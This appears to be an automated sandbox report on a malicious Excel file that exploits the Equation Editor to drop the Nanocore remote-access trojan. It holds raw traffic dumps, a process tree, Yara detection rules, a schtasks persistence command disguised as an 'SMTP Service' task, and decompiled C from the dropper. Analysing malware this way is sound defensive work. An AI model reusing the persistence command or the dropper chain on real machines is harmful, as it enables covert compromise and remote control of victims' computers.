2021-10-13 07:59:22 UTC	1016	IN	Data Raw: 46 b0 d1 a6 04 83 26 38 4c 84 c0 81 08 01 06 4e 1b ec 61 38 93 c6 1c 68 3d 92 c2 26 6c c8 04 fd c0 c2 a8 91 f5 e6 13 d0 ba ec 39 d0 bb b1 87 39 6c 50 4c 37 a7 2f 7c fd 98 e3 df 3e d9 7a 85 3b 7e b5 8c 5c 0d 81 37 05 e3 46 43 45 af 9a 33 be 18 a0 34 8d 19 45 b8 01 ec 44 6b de 3b e2 16 10 a7 f7 26 33 d4 37 0f f0 63 27 72 8e 63 bd 38 ed 91 90 a3 a1 64 c4 93 d8 03 45 54 93 8b a3 52 c2 64 ed 96 c7 7b 6e 07 62 04 c0 fe ee e9 30 37 7a 84 7d 91 c8 ce 2c 67 2a a3 38 b3 36 ae 8c d8 d3 37 fb d6 1a 69 33 45 ba 1d 33 86 9d 19 99 93 34 e5 1a 26 37 3d 54 79 d5 81 7a af 5f 15 3f 57 af ea bb 35 5d aa df 6e ab b9 55 dd aa ef 54 f7 ed ed 91 7e 1e 3a 37 0c 45 72 7c 13 06 d9 a6 aa 37 c0 92 5f c8 10 d7 a7 03 c7 20 51 8f 2c 7e 7e d4 49 88 28 ae 1c 66 09 90 98 10 21 00 89 a9 6c Data Ascii: F&8LNa8h=&l99lPL7/\|>z;~\7FCE34EDk;&37c'rc8dETRd{nb07z},g*867i3E34&7=Tyz_?W5]nUT~:7Er\|7_ Q,~~I(f!l
2021-10-13 07:59:22 UTC	1023	IN	Data Raw: e9 08 52 d8 14 08 05 c9 4e 6e 0a 4a 85 ec c1 46 c7 48 6d 00 27 97 3d 40 3a 2e f8 1a fe 32 e6 44 0a 66 90 09 35 04 a8 04 c1 a1 72 8c b6 b1 78 77 60 a9 b6 26 38 ac 79 36 d8 be e3 f0 1f 1e 2d 67 16 a2 f2 0f 5d a2 9f 66 87 a5 f9 0c ce 03 47 c3 e0 1f fd 57 9f b2 3a 6e 22 04 15 95 00 1f 0e 82 e0 5b 87 a0 6f aa 14 ba 85 1c 93 11 fb 63 2e e0 0c 82 cd 7d 64 59 24 6f 5e 49 8c e1 c2 77 68 2b 5e 63 37 c8 bc 68 b5 85 4c 70 5b d6 77 55 7f d0 8e 89 df cb a8 ea bb 06 a5 57 43 f3 9a 3c 27 fa 44 7b b5 00 34 bf f5 c9 d6 5e 42 0b e6 d4 63 3f 6d 1d f3 89 d1 16 ea 68 8f a6 c8 f6 1d 1d 64 72 8a 5b 52 ae 99 d6 aa 97 c3 63 15 29 98 63 d4 50 6d fd 7b 96 90 e1 d1 40 82 9d b9 ce 8d 44 47 18 be b9 24 ec 6c 54 25 db 47 9c 29 5e 93 5f 77 be 53 c0 3f 40 8f 5c a6 3e c0 24 3b de 4f ee b5 Data Ascii: RNnJFHm'=@:.2Df5rxw`&8y6-g]fGW:n"[oc.}dY$o^Iwh+^c7hLp[wUWC<'D{4^Bc?mhdr[Rc)cPm{@DG$lT%G)^_wS?@\>$;O
2021-10-13 07:59:22 UTC	1031	IN	Data Raw: 0f 2f 24 5e ba 12 07 84 69 92 a7 00 44 3f b2 ea 07 44 e5 c3 37 27 3d 76 6a 0e 4b 99 70 42 0a 34 04 9e 53 01 47 6b 15 8d 4a 82 04 d7 0c 18 14 27 0e 01 56 d1 62 42 6c 96 44 00 5d 9f c0 06 bb 51 05 21 8b c3 16 b4 40 37 6e 55 4a 25 6c e2 57 11 60 83 5b 0b e9 eb ea 6a ac 7e e4 4a 07 19 41 ae 2f 5e 7d 90 2b 6f 9e 38 da bc aa 89 de f8 ba fd da 35 2c 0e a0 d9 84 24 1a a2 49 95 ea b7 36 6e a9 62 bd 37 ac 8e 7b b5 66 9e d2 b3 74 ac 49 da 50 ad 9b f4 b5 b0 19 e7 d4 66 d1 25 e2 2a 53 8c 9e c6 45 8a 3e 4d cd 9b 5c 61 f8 d8 12 ea 8c b6 ae 26 77 e1 49 ca f3 83 61 56 b3 c9 de 17 59 16 a9 4c 57 32 bd b6 17 14 6b b0 01 95 11 1f ae 51 9a 85 4e d6 ad a3 d5 d4 c2 a9 71 d5 44 dc 2b b6 73 f0 e5 3d d3 f9 a7 f1 e1 29 0b a9 49 cd 7a 5a ce 28 4e 27 8f a6 dd aa 03 4e 33 56 65 9f 8a Data Ascii: /$^iD?D7'=vjKpB4SGkJ'VbBlD]Q!@7nUJ%lW`[j~JA/^}+o85,$I6nb7{ftIPf%*SE>M\a&wIaVYLW2kQNqD+s=)IzZ(N'N3Ve
2021-10-13 07:59:22 UTC	1039	IN	Data Raw: f6 1b 68 76 ea 1f 0d 0f d1 d2 a9 bb 38 7e 61 60 ab ab 91 dd 34 5f 8d 21 17 35 62 dc f4 26 08 d8 86 a2 f2 56 b0 1c 4c 23 39 83 3b b3 45 b0 63 b0 82 52 e2 f7 67 49 e5 ec d0 9f 5e 0a ba d8 30 c3 81 aa 47 85 04 b0 f9 fc 8f 59 29 02 03 0b f1 03 04 e0 04 20 69 8a bf a0 80 43 00 0d 6d 65 75 75 6c 6a 67 67 6d 2e 6a 70 67 0a 03 02 a2 cc fb af d0 bf d7 01 ce 78 ed 01 56 64 44 22 45 f4 40 54 f7 ef 39 dd 2f 59 bd 16 d5 03 a2 03 6a 02 db e6 08 a0 38 01 c1 68 23 bf bb 71 7a 8e 79 ca a9 88 89 fe 35 2c c5 4c 55 4e 1a 99 9f be d3 ea a0 a9 b0 e9 f5 97 96 f8 7d dd 43 3e 7e 1a 84 2c ab c7 51 b3 62 27 ab d6 49 a2 e7 a1 f2 b1 cc a8 5a b8 9c b9 ff 55 d3 6c 3d 29 f8 5e 19 4e e9 f0 e3 75 f1 4e ea fe c9 ee c8 1b 59 0c 8e ff df e3 34 bc b3 9f 7e dc 14 8d f2 f2 67 57 76 1a f2 ea 85 Data Ascii: hv8~a`4_!5b&VL#9;EcRgI^0GY) iCmeuuljggm.jpgxVdD"E@T9/Yj8h#qzy5,LUN}C>~,Qb'IZUl=)^NuNY4~gWv
2021-10-13 07:59:22 UTC	1047	IN	Data Raw: 8b 24 f0 4a bc 05 76 00 a0 ca 29 dd f6 7a 72 f0 1f 98 5d 93 9e 6e 82 1a 22 a1 b6 10 37 0e 1b 36 56 41 f0 59 5c 8d 78 44 82 ee 42 f2 43 9f 43 c4 c9 26 14 5f 4a 8c 89 be 29 05 3c 70 20 7a 50 12 a6 fe ba 36 67 1b 67 27 25 3e fc 9b 5b e1 66 23 a2 8b 96 07 c2 e8 46 6d 14 8c 9d ae 10 40 f4 a2 fc d6 78 0a fd 0c 1c 4c 90 8a d2 0d 53 88 7e 61 c8 97 73 a7 c7 6d 54 fe 89 41 5c 80 2a ef 8a 2a 02 03 0b c2 03 04 a1 04 20 c6 4b 73 87 80 43 00 0e 73 72 73 6c 6d 62 6b 67 61 6d 2e 78 6d 6c 0a 03 02 68 9c 0d b0 d0 bf d7 01 cb 2e be 01 40 64 34 22 45 f4 50 65 ff f2 ab 9e 2f 93 3b 3f 8e 86 a9 a2 a2 2a 3b aa 7e c3 5e 8e 27 0e 84 47 a0 4f 7f ab 7c 84 aa 0c 32 4b fb eb f2 5b 92 a4 c9 97 33 2e 4f 21 c9 c5 f5 b2 22 4f 08 db 51 4f 11 b8 d0 66 21 51 2b 8b 3c 12 ed 62 7f 0c f2 f1 dc Data Ascii: $Jv)zr]n"76VAY\xDBCC&_J)<p zP6gg'%>[f#Fm@xLS~asmTA\** KsCsrslmbkgam.xmlh.@d4"EPe/;?*;~^'GO\|2K[3.O!"OQOf!Q+<b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1240 Parent PID: 596

General

Start time:	09:58:15
Start date:	13/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa20000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2804 Parent PID: 596

General

Start time:	09:58:34
Start date:	13/10/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2860 Parent PID: 2804

General

Start time:	09:58:37
Start date:	13/10/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x260000
File size:	1073384 bytes
MD5 hash:	B866823E1F8F4A52376BD108C457DD78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: mmuiqlcvwo.pif PID: 2516 Parent PID: 2860

General

Start time:	09:58:52
Start date:	13/10/2021
Path:	C:\Users\user\33920049\mmuiqlcvwo.pif
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Imagebase:	0xfb0000
File size:	777456 bytes
MD5 hash:	8E699954F6B5D64683412CC560938507
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 27%, Virustotal, Browse Detection: 32%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: RegSvcs.exe PID: 2780 Parent PID: 2516

General

Start time:	09:58:58
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Imagebase:	0xda0000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 1724 Parent PID: 2780

General

Start time:	09:59:00
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Imagebase:	0x510000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskeng.exe PID: 2936 Parent PID: 896

General

Start time:	09:59:01
Start date:	13/10/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xffdd0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 632 Parent PID: 2936

General

Start time:	09:59:02
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Imagebase:	0xda0000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: mmuiqlcvwo.pif PID: 2568 Parent PID: 1764

General

Start time:	09:59:07
Start date:	13/10/2021
Path:	C:\Users\user\33920049\mmuiqlcvwo.pif
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp
Imagebase:	0xfb0000
File size:	777456 bytes
MD5 hash:	8E699954F6B5D64683412CC560938507
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: RegSvcs.exe PID: 684 Parent PID: 2568

General

Start time:	09:59:12
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Imagebase:	0xda0000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2860 Parent PID: 2804 vbc.exeCOMMON

Executed Functions

Function 0027CBB8, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 199
filesleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E0027CBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E0026FD49(__edx, 1);
				E002795F8("C:\Windows\system32", 0x800);
				E00279AA0( &_v208); // executed
				E00271017(0x2a7370);
				_t74 = 0;
				E0027E920(0x7104, 0x2b5d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E0027B356(0, _t110);
					if( *0x2a9601 == 0) {
						E0027C891(__eflags, _t95); // executed
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0x2bce18, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x2bce18); // executed
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E00263E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0x2a0064 = _t97;
				 *0x2a0060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0x2ab704 = _t41;
				 *0x2b5d04 = E0027A4F8(_t89, _t125);
				E0026CFAB(0x2a0078, _t89, 0x2bce18);
				E002783FC(0);
				E002783FC(0);
				 *0x2a75e8 = _t107 + 0x5c;
				 *0x2a75ec = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E0027A5D1, _t74); // executed
				 *0x2a75ec = _t74;
				 *0x2a75e8 = _t74;
				E002784AE(_t107 + 0x24);
				E002784AE(_t107 + 0x50);
				_t51 =  *0x2bde28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0x2a85f8 != 0) {
					E00279CA1(0x2bce18);
				}
				E0026E797(0x2b5c00);
				if( *0x2a75e4 > 0) {
					L00282B4E( *0x2a75e0);
				}
				DeleteObject( *0x2ab704);
				_t54 =  *0x2b5d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0x2a00e0 == 0 &&  *0x2a75d7 != 0) {
					E00266E03(0x2a00e0, 0xff);
				}
				_t55 =  *0x2bde2c;
				 *0x2a75d7 = 1;
				if( *0x2bde2c != 0) {
					E0027C8F0(_t55);
					CloseHandle( *0x2bde2c);
				}
				_t99 =  *0x2a00e0; // 0x0
				if( *0x2bde21 != 0) {
					_t58 =  *0x29d5fc; // 0x3e8
					if( *0x2bde22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0x2bde24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E00279B08(_t107 + 0x1c); // executed
				return _t99;
			}

0x0027cbb8
0x0027cbb8
0x0027cbc3
0x0027cbd2
0x0027cbdb
0x0027cbe5
0x0027cbef
0x0027cbf8
0x0027cbfd
0x0027cc06
0x0027cc08
0x0027cc0a
0x0027cc0c
0x0027cc0d
